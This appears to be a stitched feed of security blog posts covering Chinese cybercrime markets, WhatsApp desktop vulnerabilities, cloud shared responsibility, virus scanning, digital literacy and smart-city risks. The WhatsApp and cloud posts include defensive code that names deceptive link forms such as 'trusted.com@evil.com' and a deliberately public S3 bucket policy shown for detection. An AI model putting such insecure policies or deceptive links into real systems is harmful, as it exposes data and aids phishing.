Despite government censorship, a small number of Chinese cybercriminals still use dark web marketplaces to offer their services and products. Those marketplaces typically specialize in the commercialization of stolen personally identifiable information (PII), bank accounts with high balances, hacking services, and malware customization. However, these darknet markets and hacking forums are not easily accessible because the Chinese government blocks the Tor anonymity network. A large number of Chinese cybercriminals continue to use exclusive and opaque QQ groups, Weibo fora and Baidu Tieba for advertising and communication. Chinese cybercriminals are also active on the clearnet. To avoid government censors and crackdowns, Chinese cybercriminals extensively use slang or other linguistic tactics for communication and advertising, which can be difficult for outsiders to comprehend. For instance, Chinese cybercriminals call a compromised computer or server “chicken meat.” Stolen bank accounts, credit card passwords, or other hijacked accounts are referred to as either “letters” or “envelopes.” Malicious websites and email accounts used for credential phishing attacks or spamming are referred to as “boxes.” Stolen information or details stored on the magnetic stripe of a bank card are referred to as “data”, “track material” or simply “material.”

Moving Operational Base Abroad

Another noticeable trend is that an increasing number of Chinese cybercriminal gangs are moving their operational base abroad, using cryptocurrencies to launder money. They appear to prefer countries and jurisdictions with weak cybercrime legislation or weak enforcement, such as Malaysia, Indonesia, Cambodia and the Philippines. Since 2017, China’s Ministry of Public Security has uncovered over 5,000 cases of cross-border telecommunication fraud involving more than US $150 million. Some of the cybercriminal groups are highly structured and work as traditional mafia-like groups that engage delinquent IT professionals; some Chinese cybercrime gangs are well-structured with clear divisions of labor and multiple supply chains. Members are typically located in close geographic proximity, even when the attacks are transnational.

Unique Culture and Practices

Chinese hackers employ different payment methods, recruiting strategies, and operating structures from other cybercriminal undergrounds. Alipay and bank transfers are the generally accepted payment methods advertised by Chinese-language hacking forums; many other forums typically prefer Monero and Bitcoin.

The “Master-Apprentice Mechanism,” which is a form of mentorship, plays a significant role in the Chinese hacking communities. Many Chinese hacker groups utilize the strategy to recruit new members or make profits. As shown in the following graph, QQ hacking group masters, usually masterminds of an organized crime group or an administrator of a hacking community, collect training fees from the members they recruit. These members, known as “apprentices” or “hackers-in-training” are required to participate in multiple criminal “missions” before they complete the training programs. Once training is complete, they are eligible to upgrade to full-time hackers working for their masters and responsible for downstream operations, such as targeted attacks, website hacking and database exfiltration.

Figure 2: Master-Apprentice Mechanism (Source: Author)

Growth of Chinese Cybercrime

The Chinese cybercriminal underground has gone through drastic changes over the years. It gradually transformed from small local networks, targeting mostly Chinese businesses or citizens, to larger and well-organized criminal groups capable of hacking international organizations. My research indicates growing threat activity targeting individuals and organizations in South Korea, Taiwan, Singapore, Germany, Canada and the United States. Chinese cybercriminals offer a wide variety of goods and services, ranging from physical counterfeits of US and Canadian driver’s licenses, scans of counterfeit US and Canadian driver’s licenses, US cell phone numbers, credit cards and identification cards to stolen social media and email accounts.

Figure 3: Growth of Chinese cybercrime (Source: Author)

As shown in the following screenshots, 1 million stolen US email accounts with encrypted passwords are selling for US $117; 1.9 million stolen German email accounts with clear text passwords are available on the Chinese black market for US $400. Counterfeit or scanned US or Canadian passports or driver’s licenses are also for sale for as little as US $13.

Figure 4: 1 million US email accounts with encrypted passwords are for sale in the Chinese cybercriminal underground
Figure 5: 1.9 million stolen German email accounts with clear text passwords are for sale in the Chinese cybercriminal underground
Figure 6: Chinese cybercriminals sell physical counterfeits of Canadian driver’s licenses

As shown in the following screenshot, Chinese hackers are also selling stolen personal data, including identification cards and passports from Taiwan and South Korean citizens.

Figure 7: Stolen PII from Taiwanese citizens, including national identification numbers, physical addresses, cell phone numbers, etc. are for sale in the Chinese cybercriminal underground
Figure 8: Chinese hackers selling 17 million South Korean national identification numbers

Login credentials for banks around the world are available on the Chinese cybercriminal underground market, and the higher the available balance of an account, the higher its selling price. Packages of hacked accounts from major US social media companies and networking platforms, gaming service providers, as well as media service providers are sold for as little as US $29 in the underground cybercrime market. These social media accounts are sometimes hacked with the intention of using them to generate fake accounts to ensnare even more web users. A large number of email accounts from Taiwanese (e.g., @yahoo.com.tw) and South Korean email service providers (e.g., @nate.com, @yahoo.com.kr) are being sold on the Chinese black market.

Increasingly Difficult to Separate Cybercrime From Cyberespionage Activity

As the Chinese cybercriminal underground quickly expands its scope and sophistication, it is increasingly difficult to separate cybercrime from cyber espionage activity. This is especially true as I observe that Chinese cybercriminals offer services to spy on businesses and sell commodities that can be used to target businesses or government officials for economic and political espionage purposes. One of the most interesting items I found for sale in the Chinese cybercriminal underground is a full business dossier on Chinese companies and government agencies. Some Chinese hackers sell internal employee directories from high-profile technology companies. Chinese cybercriminals appear to work with malicious insiders or hire hackers to work as undercover agents inside of telecommunications service providers, financial services and technology companies to steal company secrets or other proprietary information. Documents include detailed contact information of CEOs and senior management from China’s top 50 companies. Other business proprietary information, such as credentials associated with a company’s various bank accounts, funding history, marketing strategies, and Tax Identification Number (TIN) are also available for sale on the black market. Malicious actors can use the above-mentioned information to launch targeted attacks against a business or leverage third-party vulnerabilities, such as trusted financial services, staffing firms and IT service providers to infiltrate a target system.

Conclusion

China’s cybercrime networks are rapidly growing in scope and sophistication. Compared to my earlier research paper on China’s cybercriminal underground from three years ago, Chinese cybercriminals have begun to embrace a sophisticated business-model approach and develop complex hierarchies, partnerships and collaboration with cybercriminal groups at home and internationally. These globally operating and organized cybercrime networks are basing themselves in countries with weak legal systems and law enforcement, while taking full advantage of global Internet connectivity to attack targets worldwide. A growing number of Chinese cybercriminals from these networks leverage the deep web to host their infrastructure and sell illegal goods and services, instead of relying on traditional peer-to-peer engagement through the QQ platform. To accelerate profitability, the Chinese hacking community has adopted tactics and techniques similar to Russian and other prominent cybercriminal underground markets to become more structured and service-oriented. In contrast, the Russian cybercriminal networks have been known for a multi-faceted criminal organizational structure specialized in monetizing PII theft and financial fraud, whereas China’s cybercriminal underground has placed greater emphasis on community and discipleship in achieving financial gains. Many of China’s cybercriminal networks incorporate this discipleship, also known as the “master-apprentice mechanism”, into a recruiting strategy that is largely different from their Russian counterparts. As China’s cybercrime continues to evolve and advance, international organizations operating in the Asia Pacific region are facing an expanding threat landscape from cybercriminal activity targeting high-value business assets. Intellectual property and identity theft can also cause substantial economic consequences.

The post How Chinese Cybercriminals Use Business Playbook to Revamp Underground appeared first on McAfee Blogs.

Intelligence in the Enterprise

Intelligence became an integral military discipline centuries ago. More recently, this practice evolved into what is called Intelligence Preparation of the Battlefield, or IPB. In both military and civilian agencies, the discipline uses information collection followed by analysis to provide guidance and direction to operators making tactical or organizational decisions. Used strategically, this type of intelligence puts an organization in a stronger position to operate offensively or defensively because in theory, they now know more than their enemy.

This same concept can be applied in the theater of cybersecurity operations. However, the current scope of intelligence in many enterprises describes just one aspect of the IPB discipline: information collection. The critical component missing to complete the process is a specialized researcher trained in this type of analysis and subsequent application of intelligence.

A disciplined intelligence cycle goes deep, applying advanced data collection methodologies from open, closed and proprietary sources, social media, human intelligence and the dark web against areas such as cybercrime, hacktivism, or cyber espionage to thoroughly analyze the adversary. Intelligence can ultimately be used to prepare organizations tactically and strategically to both anticipate and mitigate modern threats.

The latest research and analysis from McAfee Advanced Program Group (APG) researcher Anne An detailing the actions of Chinese non-state threat actor groups is a great example of intelligence that is invaluable for organizations. This unique take on Chinese cyber criminality educates practitioners on the threats around them, empowering them to prepare their organization to be proactive, rather than reactive. Further, there are many times where organizations are unaware they have been a victim of a cyberattack. This could include stolen data, which McAfee APG may find being sold on the dark markets, and in some cases, could have a devastating effect on their business.

Sun Tzu, the Chinese general, and military strategist once articulated, “The art of war teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.”  These ancient words are still very meaningful today. If organizations robustly embrace the intelligence process, their defensive posture will exponentially improve.


The post Intelligence in the Enterprise appeared first on McAfee Blogs.

Safer Internet Day 2020

What Can You Do To Make The Internet a Better Place

In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept that the online world is a big part of our kids’ lives.

So, let’s accept that the internet is going to be a feature of our kids’ lives and work out how best we can keep them safe.

Together For A Better Internet

Today is Safer Internet Day – an international annual event that encourages us all to work together for a better internet. The perfect opportunity to find out what we can do as parents to ensure our kids are as safe as possible online.

Organised by the joint Insafe/INHOPE network, with the support of the European Commission, Safer Internet Day is held each February to promote the safe and positive use of digital technology, especially among children and young people. Safer Internet Day is all about inspiring users to make positive changes online, to raise awareness of online safety issues, and participate in events and activities right across the globe.

What Can We Do As Parents?

As role models and life-educators, parents play an enormous role in shaping our kids’ behaviours and opinions – particularly before they get to the teenage years!! So, why not use Safer Internet Day as a prompt to freshen up your cybersafety chats with your brood.

Not sure where to start? Here are my top messages to weave into your chats with your kids

  1. Be Kind Online

Spread love not hate online. A better internet includes building an online culture where people share positive and encouraging posts and comments. It may be as simple as posting a positive message, liking a post that is encouraging or sharing an inspiring article.

It may sound obvious, but before you post a comment or a tweet, ask yourself whether the message could offend someone or affect them negatively. And remember: NEVER like, favourite or retweet a hurtful post, and never post or comment negatively online yourself.

  2. Learn How To Disagree Respectfully Online

No matter how much we try, there will always be some people online who get a kick out of being unkind. If you come across this behaviour, I encourage you to call it out and report it but ALWAYS do so in a respectful fashion. Reciprocating with harsh words or name-calling will only further inflame a toxic situation. A logical, factual response that is respectful will always triumph!

  3. Protecting Your Online Reputation (& Others Too)

If you’re planning on hiring someone or even going on a date with someone, the chances are you’re going to ‘Google’ them first. And what you find online and the opinion you form decides whether the person’s digital reputation is acceptable or not.

So, it’s essential to remember that everything you post online is permanent and public; not to post inappropriate comments or pics of yourself or others; ensure all your online profiles are set to private to avoid strangers ‘screen-grabbing’ your private info and photos; don’t respond to inappropriate requests and most importantly, take a breather when things are getting heated online and you may regret your comments and actions.

  4. Passwords!!!!!

Managing passwords is one of the best ways of taking control of your online life and creating a better internet. Having a separate password for every online account means that if one of them is exposed in a data breach, your other accounts are not at risk. Always choose passwords that are long, mix letters, numbers and symbols, and are not obvious. I love using a nonsensical sentence! And if all that’s too hard, why not consider a password manager, which not only creates complex passwords for each of your online accounts but remembers them too. All you need to do is remember the master password! Awesome!!

So, why not pledge to change up your cybersafety chats with your kids this Safer Internet Day? And remember – they are watching you too! So, ensure you always model online respect, take your online responsibilities seriously and, also manage your passwords carefully. Because every little step is a step towards a positive change.


The post Safer Internet Day 2020 appeared first on McAfee Blogs.

WhatsApp Users: Secure Your Desktop With These Tips

With over 500 million daily active users, WhatsApp is one of the world’s most popular messaging platforms. In an effort to provide even more ways to connect beyond iOS and Android, WhatsApp introduced a desktop version of the app in 2016, which allowed users to stay in touch from their home or work computer. However, security researcher Gal Weizman of PerimeterX recently disclosed, in findings reported by The Hacker News, multiple vulnerabilities in WhatsApp’s web and desktop clients which, if exploited, could allow remote attackers to compromise its users.

How safe is WhatsApp?

According to Weizman, the flaws were found in WhatsApp Web, the browser version of the messaging platform, whose code the desktop app also runs. WhatsApp Web was vulnerable to an open-redirect flaw, which lets a remote attacker send victims to arbitrary websites of the attacker’s choosing. A message carrying one of these crafted links could also trigger cross-site scripting (XSS): attacker-controlled code is injected into a trusted web application, where it runs with the victim’s session and the application’s own privileges rather than the attacker’s.


If the victim clicked the link in the message, the attacker’s script could, in the desktop app (which wraps the same web client in an Electron shell), read files from the victim’s Windows or Mac file system, which increases the risk of identity theft. What’s more, the open-redirect flaw could also be used to manipulate the preview WhatsApp displays for a link, so that the domain shown to the user need not be the one the link actually opens. This gives attackers another avenue to trick users into falling for phishing attacks.
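The two weaknesses described above, an open redirect and a link preview that can be made to show a domain other than the real destination, are both failures to validate a URL before acting on it. The following is an added example, not WhatsApp’s code, of the checks a messaging client or web app can apply: only http(s) links are rendered as clickable, a host name is never taken from message text but from the parsed URL the browser will actually contact, and a redirect parameter is honoured only for same-origin targets. The app origin, host names and function names are assumptions for the example.

```javascript
// Added example (not WhatsApp's code): vetting links before rendering a
// clickable preview, and resolving a "next"/"redirect" parameter safely.
// APP_ORIGIN is a hypothetical origin for the web client.
const APP_ORIGIN = "https://web.example.com";
const SAFE_SCHEMES = new Set(["http:", "https:"]);

// Returns { ok: true, href, host } for a link that may be rendered as a
// preview, or { ok: false, reason } for one that must stay inert text.
function vetLink(raw) {
  let url;
  try {
    // Absolute URLs only: bare text like "example.com/x" is not a link.
    url = new URL(String(raw).trim());
  } catch {
    return { ok: false, reason: "not an absolute URL" };
  }
  if (!SAFE_SCHEMES.has(url.protocol)) {
    // "javascript:" or "data:" smuggled into a message never becomes a link.
    return { ok: false, reason: "scheme " + url.protocol + " not allowed" };
  }
  if (url.username || url.password) {
    // "https://trusted.com@evil.com/" reads as trusted.com to a casual eye.
    return { ok: false, reason: "userinfo in URL" };
  }
  // The preview shows the host the browser will contact, nothing else.
  return { ok: true, href: url.href, host: url.hostname };
}

// Resolves a redirect parameter to a path on our own origin. Anything that
// would leave the origin (absolute URL, protocol-relative "//evil.com",
// backslash tricks) collapses to "/", which closes the open-redirect hole.
function safeRedirectTarget(next) {
  let url;
  try {
    url = new URL(next == null ? "" : String(next), APP_ORIGIN + "/");
  } catch {
    return "/";
  }
  if (url.origin !== APP_ORIGIN) return "/";
  return url.pathname + url.search + url.hash;
}

if (typeof module !== "undefined") {
  module.exports = { vetLink, safeRedirectTarget };
}
```

The redirect check compares the parsed origin rather than testing whether the string starts with "/", because the WHATWG URL parser turns "//evil.com" and "/\evil.com" into a different host; any string-based check that does not go through the parser the browser uses will disagree with it somewhere.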


How to stay safe

How can users continue to use messaging platforms like WhatsApp without putting themselves at risk of an attack? Follow these security tips for greater peace of mind:

  • Update, update, update. If you use WhatsApp Desktop, update to the latest version to get the patch for this flaw. The browser-based WhatsApp Web picks up the fix the next time you load it, but a stale desktop build does not.
  • Think before you click. Be skeptical of ads shared on social media sites and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message from an unknown sender, it’s best to avoid interacting with the message.
  • Hover over links to see and verify the URL. If someone you don’t know sends you a link, hover over it without clicking. The browser’s status bar shows the real destination, and that is what to check, not the preview card, since this flaw showed that previews can be forged. If the URL looks suspicious, don’t interact with it and delete the message altogether.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post WhatsApp Users: Secure Your Desktop With These Tips appeared first on McAfee Blogs.

Cloud Security is like Renting a Car!

Cloud security has many aspects, and it is easy to miss the scale of the issue by taking a simple view. For example, people may trust a particular cloud service provider and think that all security responsibility belongs to them; others look only at the technical aspects (is data encrypted?) or certifications (do they conform to ISO 27xxx?) or forget the human aspect. Sadly, any of these viewpoints can mean insecure cloud use and data loss for the company.

To explain the breadth of securing cloud, we have created a new white paper, “The Cloud Security 360° Shared Responsibility Model”, that splits cloud security requirements into nine areas and discusses how to ensure each different area is being addressed.

In other areas of life, we also have a shared responsibility, even if it is usually seamless and so we don’t think about it much, for example when renting a car.

Firstly, when the car is new the manufacturer has the responsibility that it is roadworthy; has good brakes and tires, the airbags work and it’s not going to fall apart at the first corner. During the lifetime, the rental company and the renter are hopefully not going to test the airbags, they just assume that they will work as originally installed.

Once the car gets older, the owner (the rental company) is responsible for checking the tires, the brakes, servicing the car and keeping it roadworthy, the renter simply assumes that this is the case. The renter needs to have the appropriate driving license for the vehicle, this is checked by the rental company before the car is handed over.

The car includes seat belts, installed by the manufacturer, but it is the driver’s responsibility to wear their own, and ensure that all the family members wear them too. For young children, it is the driver’s responsibility to ensure that they have appropriate child seats and for the older kids, the parent has to ensure that they do not take off their seat belt.

General insurance is shared between the rental company and the renter (who, perhaps isn’t the only driver). Ultimately, the driver is responsible for driving the car appropriately for the conditions, driving more slowly in rain and snow and not speeding around corners.

Renting a car safely is a responsibility where five groups of people all have their part to play: car manufacturer, rental company, renter, passengers and the driver. If one area is ignored, there could be an accident with tragic consequences, and it is no good saying “but I checked the other areas” – all need to be considered together.

Cloud computing is similar – you are not safe just because the cloud service provider has invested a lot in security. You are not safe just because you have anti-malware systems installed. The service provider, enterprise, IT security team and user all have a part to play, and if any one of the areas is not addressed, then security is compromised.

Cloud computing needs to be considered across each row of the shared responsibility diagram in the paper. The cloud service provider is responsible for the lowest levels of security (power, connectivity, server infrastructure etc.) and provides some security functions, but the enterprise is responsible for turning these on (think of the number of data loss incidents caused by misconfigured S3 buckets). Only the enterprise can truly decide which data is confidential, while it is users who typically decide to share and collaborate via the cloud with external parties.
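The misconfigured S3 bucket mentioned above is the textbook case of a control the provider offers but the customer must configure: a bucket policy that grants access to the anonymous principal makes every object readable by anyone on the internet. The following is an added example, not from the white paper, that shows the weak policy beside the corrected one and a small check that flags the weak pattern. Both policy documents are constructed for the example; the bucket name and account ID are hypothetical.

```javascript
// Added example (not from the white paper): detecting a bucket policy that
// grants rights to everyone. Bucket name and account ID are hypothetical.

// Weak: "*" as principal means every AWS account and every anonymous caller.
const PUBLIC_READ_POLICY = {
  Version: "2012-10-17",
  Statement: [
    {
      Sid: "PublicRead",
      Effect: "Allow",
      Principal: "*",
      Action: "s3:GetObject",
      Resource: "arn:aws:s3:::example-data-bucket/*",
    },
  ],
};

// Corrected: only a named IAM role in the owning account may read objects.
const RESTRICTED_POLICY = {
  Version: "2012-10-17",
  Statement: [
    {
      Sid: "AppReaderOnly",
      Effect: "Allow",
      Principal: { AWS: "arn:aws:iam::123456789012:role/app-reader" },
      Action: "s3:GetObject",
      Resource: "arn:aws:s3:::example-data-bucket/*",
    },
  ],
};

// IAM policy JSON allows scalars or arrays in most fields.
const asArray = (x) => (Array.isArray(x) ? x : [x]);

// IAM treats "*" and {"AWS": "*"} identically: everyone, including anonymous.
function isAnonymousPrincipal(principal) {
  if (principal === "*") return true;
  if (principal && typeof principal === "object") {
    const aws = principal.AWS === undefined ? [] : principal.AWS;
    return asArray(aws).includes("*");
  }
  return false;
}

// Returns one finding per Allow statement whose principal is everyone.
// A statement that carries a Condition is still reported but flagged: a
// condition such as aws:SourceVpce may narrow the grant to a private
// endpoint, and a reviewer decides whether it actually does.
function findPublicGrants(policy) {
  const findings = [];
  const statements = policy.Statement === undefined ? [] : policy.Statement;
  for (const st of asArray(statements)) {
    if (st.Effect !== "Allow" || !isAnonymousPrincipal(st.Principal)) continue;
    findings.push({
      sid: st.Sid === undefined ? "(no Sid)" : st.Sid,
      actions: asArray(st.Action),
      conditioned: Boolean(st.Condition && Object.keys(st.Condition).length),
    });
  }
  return findings;
}

if (typeof module !== "undefined") {
  module.exports = { PUBLIC_READ_POLICY, RESTRICTED_POLICY, findPublicGrants };
}
```

A check like this belongs in the pipeline that deploys bucket policies, not only in a periodic audit, and it complements rather than replaces the account-level S3 Block Public Access setting, which is exactly the kind of provider-supplied control that stays inert until the enterprise turns it on.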

The paper discusses all of this in detail and suggests ideas and technologies to address each row – just like renting a car, you need to address every row to be secure.


The post Cloud Security is like Renting a Car! appeared first on McAfee Blogs.

CCPA Compliance Whirlwind Continues

Proposed regulations modifications are released. While the struggle of getting ready for the CCPA continues, the media has reported mixed results of organizations responding to Consumer Rights requests. Reportedly, some organizations are responding with too much information and some with too little. Some are just missing the mark. Today, the California Attorney General’s office released […]

The post CCPA Compliance Whirlwind Continues appeared first on Privacy Ref.

Security vs. innovation: IT’s trickiest balancing act

At first glance, the deployment of cybersecurity measures and the pursuit of innovation might seem mutually exclusive. Strategies to enhance security are aimed at reducing risk, whereas innovation efforts require being open to taking risks.

But enterprises are finding ways to launch innovative new digital business initiatives while taking steps to protect data and other IT assets. By doing so, they’re establishing pathways to new revenue, improved customer experience, and new market opportunities, even as they tighten security requirements, protect systems and data and keep compliant with regulations.

After all, this is the formula for success in today’s business environment: Push transformative initiatives that embrace innovative technologies such as the cloud, mobile tech, artificial intelligence, data analytics, and the internet of things (IoT) in a way that ensures the security of valuable systems and data.


7 Conversations to Help Build Up Your Family’s Digital Literacy Skills


With the surge of misleading content online, helping your child learn to become an independent thinker is no small task.

While schools have been charged with developing students’ digital literacy skills, parents also have a role in consistently sparking deeper thinking when navigating digital environments.

The sharper a child’s digital literacy skills, the more quickly he or she can identify biased agendas and deceptive content and form thoughts, insights, and opinions independently of the digital crowd think.

Here are a few conversations to focus kids on building up digital literacy skills.

7 conversations to build digital literacy skills

  1. Grow visual literacy. The world expresses itself through media today, which makes visual literacy (the ability to interpret art and media content) another must-have skill for kids. According to recent reports, Snapchat has 10 billion video views a day, Facebook video 8 billion views a day, YouTube video 5 billion views. Instagram reports its users upload 25 million photos every day. This visual tsunami increases the chances your child will encounter deepfakes (AI-synthesized video) and malicious memes (false information placed on photos) designed to manipulate public opinion. Discuss: Learn ways to spot deepfakes with your kids (stray hairs, no blinking, unnatural eye movement, etc.). Additional resource: Watch and discuss this video and read the post Can You Spot a Deepfake? from LifeHacker with your family.
  2. Search with care. Search engines scan the web and bring up relevant content. However, not all that content is credible. Understanding a search engine’s function is essential, especially when your child is researching a paper and evaluating other content. Search engines rank by keywords, not content accuracy. Ask: Is this content credible and supported by legitimate sources? Is it presented as humor or an opinion piece? Is the URL authentic and trustworthy? Additional Resource: Common Sense Media’s video Smart Online Search Tips.
  3. Protect, respect privacy. Kids, fueled by emotion and impulse, often move around online with little thought to personal privacy or the privacy of others. Discuss: Talk about the basics often: Where are the privacy gaps in our technology? Where are there privacy gaps in my behavior? How can we create strong passwords? Are my privacy settings current? Do I have personal details in public view, either on profile info or in my posts? The other side of privacy: Respect friends’ privacy by asking permission to post photos, keeping personal secrets, and never sharing personal details or circumstances of another person in the online space.
  4. Recognize and respect points of view. The web is a big place with an ocean filled with different points of view. Part of becoming digitally literate is learning how to listen to and respect the opinions of others. Exercising this skill is essential to building empathy, eliminating cyberbullying and online shaming, and becoming a positive voice in the online space. Additional resource: Discuss Dr. Michele Borba’s blog post, 9 Habits of Empathetic Children.
  5. Always attribute content. The internet is a big place that showcases a variety of exciting, valuable, original content. However, that content doesn’t display a visible price tag. Therefore, great content is often re-shared without giving credit to the author or creator. Discuss: Talk about the value of a person’s art, writing, photos, and research. Find examples of how to correctly cite sources and share them with your child. Follow up by checking your child’s social feeds to see that sources are being cited correctly. Coach them to add attribution when needed. Additional resource: Go through this free, 5-day course for families from CyberWise on Digital Citizenship.
  6. Always consider your digital footprint. A digital footprint is anywhere we’ve personally connected online. These small digital breadcrumbs — when added together and viewed as a whole — are what others see, and consequently, believe about us. The parts of our footprint include social profiles we create, comments we leave, tweets, photos, or any time others mention us online. Ask: Is this photo something that will add or subtract value from my digital footprint? Will this post, photo, or tweet affect my chances of getting into college or competing for a job? Will I be proud of this post five years from now? Additional Resource: Author Sue Scheff’s blog post Online Reputation Reboot for Teens.
  7. Stay current with new technology. It is adults, more so than kids, who need to make a larger commitment to new technology. Part of digital literacy is keeping up with current technology and preparing for future technology. By making this learning investment, we can better understand the origin of new technologies such as AI and spinoff trends such as deepfakes. Educating ourselves on the nuances of tools such as vlogs, audio, video, AR, AI, 3D printing, and machine learning is essential to navigating the current and future landscape. Additional resources: Consider subscribing to online technology magazines to get you rolling: TechCrunch.com, TheNextWeb.com, DigitalTrends.com.

Like other areas that require time and consistency to develop, your child’s digital literacy skills will take time to mature. Author Tim Elmore says on his Growing Leaders blog that, when it comes to raising kids to thrive in the digital era, a parent’s role is clear: “We must clearly convey values and virtues like resilience, discipline, integrity, problem-solving skills, good communication, commitment, and responsibility. That’s the critical role we can play.”

So, have fun with these conversations always recognizing that your influence matters. Look for real-life digital literacy examples to talk about, and don’t forget to celebrate the wins you see your kids achieving online.

The post 7 Conversations to Help Build Up Your Family’s Digital Literacy Skills appeared first on McAfee Blogs.

How To Do A Virus Scan

Whether you think you might have a virus on your computer or devices, or just want to keep them running smoothly, it’s easy to do a virus scan. How you perform the virus scan depends on the software you have, so we’ll go through a few options below. But first, let’s cover a few telltale signs that you might have a virus.

Do You Need A Virus Scan?

Is your computer or device acting sluggish, or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Or maybe, you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are all signs that you may have a virus, but don’t get too worried yet, because many of these issues can be resolved with a virus scan.

What Does A Virus Scan Do, Exactly?

Each antivirus program works a little differently, but in general the software will look for known malware that meets a specific set of characteristics. It may also look for variants of these known threats that have a similar code base. Some antivirus software even checks for known, suspicious behavior. If the software comes across a dangerous program or piece of code, it removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

How Do You Run A Scan?

On a Windows Computer:

If you are using the latest version of Windows, Windows 10, open “Settings”, choose “Update & Security”, then “Windows Security” and “Virus & threat protection”. From there you can start a “Quick scan” with the built-in Microsoft Defender Antivirus, or pick “Scan options” for a full scan.

Of course, many people have invested in more robust antivirus software that has a high accuracy rate and causes less drain on their system resources, such as McAfee Total Protection. To learn how to run a virus scan using your particular antivirus software, search the software’s “help” menu, or look online for exact instructions.


On a Mac Computer:

Computers running macOS don’t have a user-facing antivirus scanner (the built-in XProtect checks run silently and cannot be invoked for an on-demand scan), so you will have to download security software to do a virus scan. There are some free antivirus applications available online, but we always recommend investing in trusted software that can protect you from a variety of threats. Downloading free software from an unknown source is risky, since cybercriminals know that fake “antivirus” downloads are a good way to spread malware.

Whichever program you choose, follow their step-by-step instructions on how to perform a virus scan, either by searching under “help”, or looking it up on their website.

On Smartphones & Tablets:

Yes, you can get a virus on your phone or tablet, although they are less common than on computers. However, the wider category of mobile malware is on the rise, and your device can get infected if you download a risky app, click on an attachment in a text message, visit a dangerous webpage, or connect to another device that has malware on it.

Fortunately, you can protect your devices with mobile security software. It doesn’t usually come installed, so you will have to download an application and follow the instructions.

Because the Android platform is an open operating system, there are a number of antivirus products available for Android devices, allowing you to do a virus scan.

Apple devices are a little different, however, because iOS is a closed platform that sandboxes every app: a third-party security app cannot inspect other apps’ files or the system itself, so there is nothing for a traditional scanner to scan. Although Apple has taken other security precautions to reduce malware risks, such as only allowing the installation of apps from Apple’s official App Store, these measures aren’t the same as an antivirus program.

For more robust protection on your Apple devices, you can install mobile security software to protect the private data you have stored on your phone or tablet, such as contacts, photos, and messages.

All-In-One Protection:

If safeguarding all your computers and devices sounds overwhelming, you can opt for a comprehensive security product that protects computers, smartphones and devices from a central control center, making virus prevention a snap.

Why are virus scans so important?

New online threats emerge every day, putting our personal information, money, and devices at risk. In the first quarter of last year alone McAfee detected 504 new threats per minute, as cybercriminals adopted new tactics. That’s why it is essential to stay ahead of these threats by using security software that is constantly monitoring and checking for new known threats, while safeguarding all of your sensitive information. Virus scans are an essential part of this process when it comes to identifying and removing dangerous code.

How Often Should You Do A Virus Scan?

Most antivirus products regularly scan your computer or device in the background, so you will only need to start a manual scan if you notice something suspicious, like crashes or excessive pop-ups. You can also schedule regular scans at a time that suits you.

Preventing Viruses

Of course, the best protection is to avoid getting infected in the first place. Here are a few smart tips to avoid viruses and other malware:

  • Learn how to surf safely so you can avoid risky websites, links, and messages. This will go a long way in keeping you virus-free.
  • Never click on spammy emails or text messages. These include unsolicited advertisements and messages from people or companies you don’t know.
  • Keep the software on your computers and devices up to date. This way you are protected from known threats, such as viruses and other types of malware.
  • Invest in comprehensive security software that can protect all of your devices.
  • Stay informed on the latest threats, so you know what to look out for. The more you know about the latest scams, the easier they will be to spot and avoid.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Do A Virus Scan appeared first on McAfee Blogs.

Keys to the Kingdom, Smart Cities Security Concerns

By Sean Wray, VP NA Government Programs, Certes Networks

Smart cities seem inevitable. According to IDC, Smart City initiatives attracted technology investments of more than £63 billion globally in 2018, and spending is estimated to grow to £122 billion in 2022. Similarly, in 2018, the number of major metropolitan cities relying on or developing a comprehensive smart city plan – as opposed to implementing a few innovative projects without an overall smart plan – dramatically increased.

In the US, for example cities like Philadelphia, Newark and Chicago all have goals to upgrade and to become leading ‘SMART’ cities, while UK innovation is being spearheaded by major conurbations such as Bristol, London and Manchester.


A significant investment is being made by cities in data connectivity providing a number of technologies such as Wi-Fi 6, smart grid, and IoT sensor devices, all promising to enhance overall visibility and security. However, as we extend the reach of technology and connectivity, there will increasingly be cyber-risks to take into account. As part of their transformation, smart cities serve as a technology hub and gateway to major institutions such as banks, hospitals, universities, law enforcement agencies, and utilities. This means the storage and transmission of customer data such as social security numbers, addresses, credit card information, and other sensitive data, is a potential goldmine for malicious actors. Not to mention an increasing number of projects monitoring roads, traffic, traffic light and metro services, all of which must be kept secure from threats at all times.

Security Challenges

When connectivity and innovation meet such large city infrastructures, they immediately become vulnerable to cyber threats from malicious actors waiting to bring all that hard work to a standstill. And the routes in are manifold.


We are increasingly dealing with connected versions of devices that have existed for a long time, such as CCTV cameras, and as a consequence, digital security is not very often incorporated into their designs.

In addition, cybersecurity will have to extend far past personal, or internal corporate networks, to encompass far-ranging technological protection for vast city networks at a scale and a pace many are struggling to respond to.

Moreover, the sheer volume of data being collected and transmitted across a multi-user network, with numerous locations, can be extremely challenging to protect. London’s City Hall Datastore, for example, holds over 700 sets of big data that help address urban challenges and improve public services, and the rise of cashless payment methods for transport adds yet more sensitive data in transit.

It is the complexity that the above factors represent that often overwhelms a network security team’s ability to ensure sensitive data is protected with encryption, especially when network infrastructures are built from different vendors’ technology, many of which do not provide strong encryption. This also applies to the many municipalities that run older legacy, third-party or disaggregated networks.

It is therefore not a matter of if but when sensitive data may fall into the wrong hands. Network security teams have to ensure that any breach is detected immediately, before an intrusion spreads from one network system to the next and potentially shuts off critical services for thousands of companies, not to mention for those who live in the city itself.

Providing the Keys

Choosing the right encryption solution is critical and can be key in mitigating damage caused by a data breach. Most cities find implementing these solutions disruptive and complex, especially for organisations that operate large and diverse networks. For example, manual configuration of encryption can lead to human error unknowingly exposing risk, and managing multiple vendors can be burdensome and inefficient. Most importantly, network visibility is lost with many encryption solutions, which is a significant issue as it reduces the ability of security teams to detect and thwart malicious actors and cyber threats.


